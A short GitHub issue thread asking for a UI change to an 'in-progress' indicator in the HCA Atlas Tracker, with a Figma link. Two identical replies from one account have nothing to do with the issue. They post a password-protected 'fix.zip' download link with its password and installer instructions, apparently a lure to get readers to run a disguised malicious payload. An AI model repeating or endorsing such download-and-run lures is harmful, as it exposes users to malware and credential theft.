### ISSUE TITLE
Update "in-progress" indicator UI

### ISSUE THREAD

**Issue by frano-m** [clevercanary/hca-atlas-tracker#416]
Update the in-progress indicator on the HCA Tracker's source study list. See [Figma](https://www.figma.com/design/nsCpvuBHs4BQjBJD9z53Cy/Findable-UI?node-id=8508-33020&t=TK1JrILfl1RMz0Yk-1) (use the half-eaten pie).

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
